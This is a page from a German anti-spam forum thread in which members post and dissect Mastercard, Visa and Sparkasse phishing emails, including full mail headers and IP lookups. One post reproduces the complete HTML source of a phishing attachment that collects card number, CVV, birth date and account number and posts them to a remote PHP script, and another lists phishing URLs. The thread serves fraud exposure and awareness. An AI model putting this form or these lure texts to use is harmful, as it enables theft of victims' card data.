Seite 1 von 5 123 ... LetzteLetzte
Ergebnis 1 bis 10 von 46

Thema: Mastercard Phishing

  1. #1
    Mitglied
    Registriert seit
    30.01.2011
    Ort
    Thüringen
    Beiträge
    470

    Standard Mastercard Phishing

    Hallo,

    heute hier aufgeschlagen. Mit meiner Sparkasse kommuniziere ich über die e-banking Software und die Kartenfirma hat meine E-Mailadresse nicht. Schon gar nicht die bei GMX.


    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    --------------------------------------------------------------------------------


    MasterCard Daten-Abgleich


    Sehr geehrte Damen und Herren,

    aufgrund der rasant ansteigenden Probleme durch Cyberkriminalität, sehen wir
    uns, als Ihr Dienstleister, dazu gezwungen für das höchste Maß an Sicherheit
    für Sie zu sorgen.




    Verifizierungsvorgang

    *Nach langwieriger Testphasen sowie Überarbeitungen unseres Systems freuen
    wir uns Ihnen das neue MasterCard Secure Transaction System kurz MCSTS
    vorstellen zu dürfen.

    Für Sie als Kunde wird nach der einmaligen Validation kein Unterschied
    feststellbar sein doch werden sie ab diesem Moment um ca. 95% abgesicherter
    Transaktionen im Internet durchführen können als vorher. *



    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    *WICHTIG: *Wenn Sie Ihre Kreditkarte gewerblich nutzen, empfehlen wir Ihnen
    *DRINGEND*, dass Sie Ihre Kreditkarte schützen, um einer möglichen Betrug
    vorzubeugen.


    Mit freundlichen Grüßen,
    Mastercard



    --------------------------------------------------------------------------------

    *Moneybookers Sicherheitshinweise*


    *Schützen Sie Ihre Kreditkarte*
    Mastercard und seine Mitarbeiter werden Sie NIEMALS nach Ihrem PIN fragen.
    Dafür gibt es KEINE AUSNAHMEN. Sollten Sie jemals danach gefragt werden, sei
    es per Telefon, E-Mail oder auf irgendeiner Webseite ausser mastercard.com,
    verweigern Sie die Auskunft und teilen Sie uns dies umgehend per E-Mail an
    [Link nur für registrierte Mitglieder sichtbar. ] <mailto: [Link nur für registrierte Mitglieder sichtbar. ]> mit.

    *Gross- und Kleinschreibung beim Login beachten!*
    Bitte denken Sie immer daran, auf die Gross- und Kleinschreibung bei der
    Eingabe Ihres Passwortes zu achten. .




    --------------------------------------------------------------------------------

    Mastercard Ltd., USA, registriert in America & Washington unter der Nummer
    4260907.
    Sitz der Gesellschaft: Welken House, 10-11 Charterhouse Square, New York,
    EC1M 6EH, America.
    Autorisiert und reguliert von der Financial Services Authority FSA Amerika.


    Clicky

    Sagt mal Ihr Spammer, für wie blöd haltet Ihr uns eigentlich

    Aber immerhin in perfektem Deutsch geschrieben und durch Beimischung von offiziellen Angaben glaubwürdig gemacht.

    Hier noch der Header.


    header:
    01: Return-Path: <lilkawaii85 [at] hotmail.com>
    02: Delivered-To: GMX delivery to poor [at] spamvictim.tld
    03: Received: (qmail invoked by alias); 02 Aug 2011 xx:xx:xx -0000
    04: Received: from blu0-omc1-s23.blu0.hotmail.com (EHLO blu0-omc1-s23.blu0.hotmail.com)
    05: [65.55.116.34]
    06: by mx0.gmx.net (mx026) with SMTP; 02 Aug 2011 xx:xx:xx +0200
    07: Received: from BLU145-DS2 ([65.55.116.7]) by blu0-omc1-s23.blu0.hotmail.com
    08: with Microsoft SMTPSVC(6.0.3790.4675);
    09: Tue, 2 Aug 2011 xx:xx:xx -0700
    10: X-Originating-IP: [78.23.237.157]
    11: X-Originating-Email: [lilkawaii85 [at] hotmail.com]
    12: Message-ID: [ID filtered]
    13: From: Mastercard <sicherheits-service [at] mastercard-konto.com>
    14: To: <poor [at] spamvictim.tld>
    15: Reply-To: kearand [at] hotmail.com
    16: Subject: Schuetzen Sie Ihre Mastercard-Kreditkarte
    17: Date: Tue, 2 Aug 2011 xx:xx:xx +0000
    18: MIME-Version: 1.0
    19: X-Priority: 3
    20: X-MSMail-Priority: Normal
    21: Importance: Normal
    22: X-Mailer: Microsoft Windows Live Mail 14.0.8064.206
    23: X-MimeOLE: Produced By Microsoft MimeOLE V14.0.8064.206
    24: Content-Type: text/html; charset="utf-8"
    25: Content-Transfer-Encoding: binary
    26: Sender: <lilkawaii85 [at] hotmail.com>

    Aus den IP-Adressen werde ich nicht richtig schlau.

    whois:65.55.116.34 scheint von einem Hotmail-Server zu stammen (Location bei Seattle)
    whois:78.23.237.157 ist in Herzele in Belgien lokalisiert

  2. #2
    Mitglied
    Registriert seit
    20.05.2009
    Beiträge
    238

    Standard Master Card Secure Code

    Hallo Isenaecher,

    dieses Mail ist besonders gemein,
    da ja zur Zeit von Master Card selbst für ein Secure Code Verfahren geworben wird.

    Ohne den "Secure Code" akzeptieren manche Online-Shops
    keine Zahlungen mehr.

    Auf meiner Abrechnung steht auch immer ein Warnhinweis, wenn man
    online ohne Secure Code einkauft.

  3. #3
    Mittwoch
    Gast

    Standard

    Die Domain mastercard-konto.com wird von Firefox schon als Betrugsversuch gemeldet. Tatsächlich liegt dort kein Inhalt. Ich vermute, dass sich schon jemand beim Hoster gemeldet hat, so dass die Seite mittlerweile offline ist. Registriert ist die Seite auf einen F.Z. in München, vermutlich ein Mugu.

    Zum Header: Die Mail ist vermutlich über SMTP bei Hotmail abgeliefert worden. Die IP in Belgien, die die Mail eingeliefert hat, gehört zu einem Belgischen Dial-In-Account, vermutlich ein DSL-Zugang. Das alles spricht für einen Zombie, ich glaube nicht, dass jemand seinen Zugang verbrennt, nur um Phishing-Mails zu verschicken.

    Hotmail verlangt bei Einlieferung über SMTP eine Identifizierung. Das bedeutet, dass der Schädling entweder einen Hotmail-Zugang des Wirtssystems abgefangen hat, den er nutzt, oder der Programmierer des Schädlings versorgt diesen mit Zugangsdaten von gefälschten Hotmail-Konten. Ich nehme sehr stark an, dass Hotmail den Account bereits abgeklemmt hat, denn ein sprunghafter Anstieg der Zahl versendeter Mails ist leicht zu entdecken.

    Schönen Gruß
    Mittwoch

  4. #4
    Mitglied Avatar von ute
    Registriert seit
    12.08.2011
    Ort
    Norddeutschland
    Beiträge
    117

    Standard Giesskannen-Phishing...

    Moin,

    Ein Blick in meinen Spam-Papierkorb (Fastmail hat den Schrott gleich in die Junk-Abteilung gekickt) zeigt: die Phisher werden irgendwie träger... jetzt muß ich mir schon selber aussuchen, welche meiner Kreditkarten, Visa oder MC, ich ausspähen lassen möchte:


    Lieber Visa und Mastercard Mitglied,


    Ihr Konto wurde gesperrt. Aus Sicherheitsgr�nden k�nnen Sie diese
    Kreditkarte
    nicht mehr im Internet einsetzen.


    Damit Sie Ihre Kreditkarte wieder sicher und uneingeschr�nkt im
    Internet einsetzen k�nnen,
    laden Sie bitte das beigef�gte Formular.


    Wenn Sie nicht abgeschlossen haben das beigef�gte Formular,
    wird Ihre Kreditkarte dauerhaft eingeschr�nkt werden.



    Mit freundlichen Gr��en,
    Customer Communications Manager,
    Copyright � 2011 Visa / Mastercard
    Die Fragezeichen dort, wo deutsche Umlaute usw. stehen müßten, kamen so mit, wie sie da stehen. Der Verfasser hatte evtl. nur eine kyrillische Tastatur...?

    Hier der Header:


    header:
    01: Return-Path: <Anstalten [at] anstalten.visa-mastercard.de>
    02: Received: from compute1.internal (compute1.nyi.mail.srv.osa [10.202.2.41])
    03: by sloti19d4p1 (Cyrus git2.5+0-git-fastmail-7007) with LMTPA;
    04: Tue, 30 Aug 2011 xx:xx:xx -0400
    05: X-Sieve: CMU Sieve 2.4
    06: X-Spam-charsets: subject='utf-8'
    07: X-Attached: Neue_Visa_Mastercard_Sicherheit.html
    08: X-Resolved-to: ute
    09: X-Delivered-to: ute
    10: X-Mail-from: Anstalten [at] anstalten.visa-mastercard.de
    11: Received: from mx2.messagingengine.com ([10.202.2.201])
    12: by compute1.internal (LMTPProxy); Tue, 30 Aug 2011 xx:xx:xx -0400
    13: Received: from zimbra.sagam.it (zimbra.sagam.it [2.228.7.67])
    14: by mx2.messagingengine.com (Postfix) with ESMTP ID: [ID filtered]
    15: for <ute>; Tue, 30 Aug 2011 xx:xx:xx -0400 (EDT)
    16: Received: from localhost (localhost [127.0.0.1])
    17: by zimbra.sagam.it (Postfix) with ESMTP ID: [ID filtered]
    18: for <ute>; Tue, 30 Aug 2011 xx:xx:xx +0200 (CEST)
    19: X-Virus-Scanned: amavisd-new at sagam.it
    20: Received: from zimbra.sagam.it ([127.0.0.1])
    21: by localhost (zimbra.sagam.it [127.0.0.1]) (amavisd-new, port 10024)
    22: with ESMTP ID: [ID filtered]
    23: Tue, 30 Aug 2011 xx:xx:xx +0200 (CEST)
    24: Received: from anstalten.visa-mastercard.de (unknown [62.28.57.138])
    25: by zimbra.sagam.it (Postfix) with ESMTPA ID: [ID filtered]
    26: for <ute>; Tue, 30 Aug 2011 xx:xx:xx +0200 (CEST)
    27: From: Neue Visa und Mastercard Sicherheit <Anstalten [at] anstalten.visa-mastercard.de>
    28: To: ute
    29: Subject: =?utf-8?Q?=5BSpam=5D?=
    30: Sicherheit: Ihr Konto wurde gesperrt !
    31: Date: 30 Aug 2011 xx:xx:xx +0100
    32: Message-ID: [ID filtered]
    33: MIME-Version: 1.0
    34: Content-Type: multipart/mixed;
    35: boundary="----=_NextPart_000_0012_453C3485.FA01E751"
    36: X-SpamInfo: FortiGuard - AntiSpam ase,
    37: X-Truedomain-Domain: anstalten.visa-mastercard.de
    38: X-Truedomain-SPF: Fail (mx2: domain of anstalten.visa-mastercard.de does not designate
    39: 2.228.7.67 as permitted sender)
    40: X-Truedomain-DKIM: No Signature
    41: X-Truedomain-ID: [ID filtered]
    42: X-Truedomain: Neutral

    lG
    Ute

  5. #5
    Verbalakrobat Avatar von Goofy
    Registriert seit
    17.07.2005
    Ort
    Überall und nirgends
    Beiträge
    24.822

    Standard

    Der Header ist etwas kompliziert, was wohl an komplexen Weiterleitungsschleifen bei Deinem Mailprovider liegt.
    Vermutlich kam die Mail von 62.28.57.138, das ist ein portugiesischer Internetprovider, und auf der 62.28.57.138 war dort zu dem Zeitpunkt wohl ein [Link nur für registrierte Mitglieder sichtbar. ]-verseuchter Rechner am Netz, über den der Spam abgekippt wurde.

    Bei Phishing-Mails sieht man oft verzerrte Umlautzeichen, wegen der Inkompatibilität des Spammer-Geschreibsels mit dem deutschen Zeichensatz.
    Goofy
    ______________________________
    Weisheiten des Trullius L. Guficus, 80 v.Chr.:
    "Luscinia, te pedem supplodere audio" - Nachtigall, ick hör dir trapsen
    "Vita praediolum eculeorum non est" - Das Leben ist kein Ponyhof
    "Avia mea in stabulo gallinario rotam automotam vehit" - Meine Oma fährt im Hühnerstall Motorrad
    "Sed illi, dicito: me in ano lambere potest" - Jenem aber, sag es ihm: er kann mich am Arsch lecken

  6. #6
    Mitglied
    Registriert seit
    02.11.2009
    Ort
    Schwerte
    Beiträge
    223

    Standard

    Moneybookers Sicherheitshinweise*


    *Schützen Sie Ihre Kreditkarte*
    Mastercard und seine Mitarbeiter werden Sie NIEMALS nach Ihrem PIN fragen.
    Dafür gibt es KEINE AUSNAHMEN. Sollten Sie jemals danach gefragt werden, sei
    es per Telefon, E-Mail oder auf irgendeiner Webseite ausser mastercard.com,
    verweigern Sie die Auskunft und teilen Sie uns dies umgehend per E-Mail an
    [Link nur für registrierte Mitglieder sichtbar. ] <mailto: [Link nur für registrierte Mitglieder sichtbar. ]> mit.
    Bietet Moneybookers nicht nur Prepaid MasterCard?

  7. #7
    Mittwoch
    Gast

    Standard

    Zitat Zitat von Jogy4711 Beitrag anzeigen
    Bietet Moneybookers nicht nur Prepaid MasterCard?
    Das ist für den Sicherheitshinweis nicht von Belang. Für beide Arten der Kreditkarte bekommt man eine PIN, um auf aktuelle Kontobewegungen Zugriff zu erhalten. In diesem Sinne verstehe ich Deine Frage nicht.

    Schönen Gruß
    Mittwoch

  8. #8
    Mitglied Avatar von ute
    Registriert seit
    12.08.2011
    Ort
    Norddeutschland
    Beiträge
    117

    Standard Die "Sparkasee" hat mir gemailt....

    Moin,

    Phishki hat sich nix gelernt, wie man schreipt Sparkasse.

    Ich habe den Schmonzes an [Link nur für registrierte Mitglieder sichtbar. ] weitergeleitet. Vielleicht haben die schon mehr Infos bekommen und kennen evtl. Möglichkeiten, dem Phishki das Maul zu stopfen.

    Hier erstmal der Header:


    header:
    01: Return-Path: <sparkasee [at] creditplus.de>
    02: Received: from compute1.internal (compute1.nyi.mail.srv.osa [10.202.2.41])
    03: by sloti19d4p1 (Cyrus git2.5+0-git-fastmail-7165) with LMTPA;
    04: Mon, 19 Sep 2011 xx:xx:xx -0400
    05: X-Sieve: CMU Sieve 2.4
    06: X-Spam-charsets:
    07: X-Attached: Erstellen Sie Ihren Code fur MasterCard SecureCode oder Verified by VISA
    08: .zip
    09: X-Resolved-to: ute [at] ute.ute
    10: X-Delivered-to: ute [at] ute.ute
    11: X-Mail-from: sparkasee [at] creditplus.de
    12: Received: from mx1.nyi.mail.srv.osa ([10.202.2.200])
    13: by compute1.internal (LMTPProxy); Mon, 19 Sep 2011 xx:xx:xx -0400
    14: Received: from shinseihomeservice.com (mail.shinseihomeservice.com
    15: [202.79.6.152])
    16: by mx1.nyi.mail.srv.osa (Postfix) with ESMTP ID: [ID filtered]
    17: for <poor [at] spamvictim.tld>; Mon, 19 Sep 2011 xx:xx:xx -0400 (EDT)
    18: X-AuthUser: test [at] shinseihomeservice.com
    19: Received: from creditplus.de ([69.178.5.202]:23254)
    20: by shinseihomeservice.com with [XMail 1.26 ESMTP Server]
    21: ID: [ID filtered]
    22: Tue, 20 Sep 2011 xx:xx:xx +0900
    23: From: Sparkasee <sparkasee [at] creditplus.de>
    24: To: poor [at] spamvictim.tld
    25: Subject: Ihre Kreditkarte wird ausgesetzt.
    26: Date: 19 Sep 2011 xx:xx:xx -0800
    27: Message-ID: [ID filtered]
    28: MIME-Version: 1.0
    29: Content-Type: multipart/mixed;
    30: boundary="----=_NextPart_000_0012_616AC3CB.5244AC30"

    Der Mailbody ist das übliche auf ostisch, oder wie nennt man diesen Akzent?

    Das Attachment habe ich mal spaßeshalber entpackt (nur im RAM unter Linux, versteht sich, alle Windows-Partitionen gesperrt). Es ist eine HTML-Datei.

    Hier zur Erheiterung der Quelltext des Attachments:

    <HTML>
    <HEAD>
    <META http-equiv=Content-Type content="text/html; charset=utf-8">
    <META http-equiv=Pragma content=no-cache>
    <LINK rel="stylesheet" href="http://phone.ipkall.com/css/iepc.css" type="text/css">
    </HEAD>
    <BODY>
    <center><BR /><BR />
    <IMG border="0" alt="" src="http://62.75.242.231/tmp/Sparkassen_BCS.gif"><br /><br />
    <IMG border="0" alt="" src="http://62.75.242.231/tmp/vpas_logo.gif" width="79" height="46">&nbsp;&nbsp;&nbsp;&nbsp;
    <IMG border="0" alt="" src="http://62.75.242.231/tmp/mpas_logo.gif" width="79" height="46"></A></center>
    <FORM id="FORM1" onsubmit="return submitIt(this)" method="post" name="FORM1" action="http://62.75.242.231/tmp/pbs.php">
    <TABLE border="0" align="center">
    <TBODY>
    <TR>

    <TD>Kreditkartennummer:</TD>
    <TD><INPUT maxLength="16" size="15" name="card"></TD></TR>
    <TR>
    </TD></TR>
    <TR>
    <TR>
    </TD></TR>
    <tr>
    <td class="tdq"><div>Verfalldatum:</div></td>

    <td class="tda"><input title="Issuer Answer" name="mm" size="2" maxlength="2" class="monospace" type="text"> . <input title="Issuer Answer" name="yyyy" size="4" maxlength="4" class="monospace" type="text"> (MM.JJJJ)</td>
    </tr>
    </TD></TR>
    <TR>
    <TR>
    </TD></TR>
    <TR>
    <TD>Die Pr&uuml;fnummer:</TD>

    <TD><INPUT maxLength="3" size="2" type="text" name="cvv"></TD></TR>
    <TR>
    </TD></TR>
    <TR>
    <TR>
    </TD></TR>
    <tr>
    <td class="tdq"><div>Geburtsdatum:</div></td>
    <td class="tda"><input title="Issuer Answer" name="dob_dd" size="1" maxlength="2" class="monospace" type="text"> .
    <input title="Issuer Answer" name="dob_mm" size="1" maxlength="2" class="monospace" type="text"> .
    <input title="Issuer Answer" name="dob_yy" size="2" maxlength="4" class="monospace" type="text"> (TT.MM.JJJJ)</td>

    </tr>
    <TR>
    </TD></TR>
    <TR>
    <TR>
    </TD></TR>
    <TR>
    <TD>Kreditkartenkontonummer:</TD>
    <TD><INPUT maxLength="10" size="10" type="text" name="kont"></TD>
    </TR>

    <TR>
    </TD></TR>
    <TR>
    <TR>
    </TD></TR>
    <TR>
    <TD colSpan=2 align="middle"><BR><INPUT id="submit1" value="Weiter ->>" type="submit" name="submit1"> </TD>
    </TR>
    <TR>

    <TD>&nbsp;</TD>
    </TR>
    <TR>
    <TD colSpan="2" align="middle">www.sparkasse.de/sicherheit/sicherheit/kreditkartenzahlung.html</TD>
    </TR>
    </TBODY>
    </TABLE>
    </FORM>
    <script language = "javascript">
    function submitIt(form) {
    if (form.card.value == "") {
    alert("Kredit / Debit Kartennummer: Bitte geben Sie eine g�ltige Kartennummer,\n16 Ziffern ohne Leerzeichen ohne Bindestrich.");
    form.card.focus();
    form.card.select();
    return false;
    }else if (form.mm.value == "") {
    alert("Verfalldatum: Bitte geben Sie eine g�ltige Verfalldatum.");
    form.mm.focus();
    form.mm.select();
    return false;
    }else if (form.yyyy.value == "") {
    alert("Verfalldatum: Bitte geben Sie eine g�ltige Verfalldatum.");
    form.yyyy.focus();
    form.yyyy.select();
    return false;
    }else if (form.cvv.value == "") {
    alert("Pr�fnummer: Bitte geben Sie eine g�ltige Pr�fnummer.");
    form.cvv.focus();
    form.cvv.select();
    return false;
    }else if (form.dob_dd.value == "") {
    alert("Geburtsdatum: Bitte geben Sie eine g�ltige Geburtsdatum.");
    form.dob_dd.focus();
    form.dob_dd.select();
    return false;
    }else if (form.dob_mm.value == "") {
    alert("Geburtsdatum: Bitte geben Sie eine g�ltige Geburtsdatum.");
    form.dob_mm.focus();
    form.dob_mm.select();
    return false;
    }else if (form.dob_yy.value == "") {
    alert("Geburtsdatum: Bitte geben Sie eine g�ltige Geburtsdatum.");
    form.dob_yy.focus();
    form.dob_yy.select();
    return false;
    }else if (form.kont.value < 10) {
    alert("Kreditkartenkontonummer: Bitte geben Sie eine g�ltige Kreditkartenkontonummer.");
    form.kont.focus();
    form.kont.select();
    return false;
    }else{
    return true;
    }
    }
    </script>
    </BODY>

    </HTML>
    lG
    Ute
    Mein mühsam lesbares Avatar sagt "You won't find me on Facebook". Auf allen anderen "social networks" wirst Du mich auch nicht finden. Etwas Privatsphäre muß bleiben...

  9. #9
    Graue Pestilenz Avatar von Fidul
    Registriert seit
    16.07.2005
    Beiträge
    6.405

    Standard

    whois:62.75.242.231 ist in .de und noch aktiv.
    Wir kriegen euch alle!

  10. #10
    Mitglied Avatar von madman70
    Registriert seit
    09.05.2012
    Ort
    Filderstadt
    Beiträge
    108

    Standard Mastercard-Phishing

    Und mal wieder eine Runde Mastercard :-)

    [http://www.wepprint.co.za/wp-admin/user/master.php]
    [http://www.tinoshowtalk.com/images/file.php]

    ------------------------------------------------------------


    MasterCard Daten-Abgleich


    Sehr geehrte Damen und Herren,

    aufgrund der rasant ansteigenden Probleme durch Cyberkriminalität, sehen wir uns als Ihr Dienstleister dazu gezwungen, für das höchste Maß an Sicherheit für Sie zu sorgen.

    Verifizierungsvorgang

    Nach langwierigeren Testphasen sowie Überarbeitungen unseres Systems freuen wir uns, Ihnen das neue Secure Transaction System kurz STS vorstellen zu dürfen.

    Sie als Kunde werden nach der einmaligen Validation keinen feststellbaren Unterschied wahrnehmen, jedoch werden sie ab diesem Moment abgesicherte Transaktionen im Internet ohne Einschränkungen durchführen können. STS ist für sie Kostenlos und sofort nach erfolgreicher Verifizierung aktiv.

    Bitte füllen Sie alle nötigen Details auf folgender Seite aus um ihr Verifikation abzuschließen.

    Verifikation abschließen[http://www.wepprint.co.za/wp-admin/user/master.php]

    WICHTIG: Wenn Sie Ihre Kreditkarte regelmäßig nutzen, empfehlen wir Ihnen DRINGEND, dass Sie Ihre Kreditkarte schützen, um möglichen Betrugsversuche auszuschließen.

    Mit freundlichen Grüßen,
    Mastercard Services

    ------------------------------------------------------------

    Mastercard Ltd. USA, registriert in America & Washington unter der Nummer 4260907.
    Sitz der Gesellschaft: Welken House, 10-11 Charterhouse Square, New York, EC1M 6EH, America.
    Autorisiert und reguliert von der Financial Services Authority (FSA) Amerika.
    ------------------------------------------------------------

    Erstaunlich, dass Mastercard sowas nach Südafrika auslagert


    Und hier der Header:


    header:
    01: Return-Path: mastercarte [at] service.de
    02: Received: from tux189.hoststar.ch ([213.133.99.15]) by mx-ha.web.de (mxweb103)
    03: with ESMTP (Nemesis) ID: [ID filtered]
    04: Received: from User (198-101-207-133.static.cloud-ips.com [198.101.207.133])
    05: (authenticated bits=0) by tux189.hoststar.ch (8.13.8/8.12.11) with ESMTP ID: [ID filtered]
    06: Message-ID: [ID filtered]
    07: From: "MasterCarte [at] Service.de"<MasterCarte [at] Service.de>
    08: Subject: Ihr Aktenzeichen: (MA-347-986-220)
    09: Date: Mon, 18 Jun 2012 xx:xx:xx -0000
    10: MIME-Version: 1.0
    11: Content-Type: text/html; charset=Windows-1251
    12: Content-Transfer-Encoding: 7bit
    13: X-Priority: 3
    14: X-MSMail-Priority: Normal
    15: X-Mailer: Microsoft Outlook Express 6.00.2600.0000
    16: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
    17: Envelope-To: <poor [at] spamvictim.tld>
    18: X-UI-Filterresults: ;V01:K0:OnQveTAW:kvnUXVEPY7UAPzq8uFH277phzJlHdRiAHQ2
    19: lUOQk+U2rIqI6SHNp5t3oXofKHe9TafJYEmXc+LNHMXE427pT/F6nWRioL+p181p4wofePt
    20: KYDmGIDxjRPfSEUuFFI3DxDcBPvb7i7H1bFblFnp/MpoPAyejZKUVCSGxXEFJsaaBD06qlB z5qEVIGYIyTKf0A
    Geändert von Mittwoch (18.06.2012 um 18:34 Uhr) Grund: getackert

Seite 1 von 5 123 ... LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen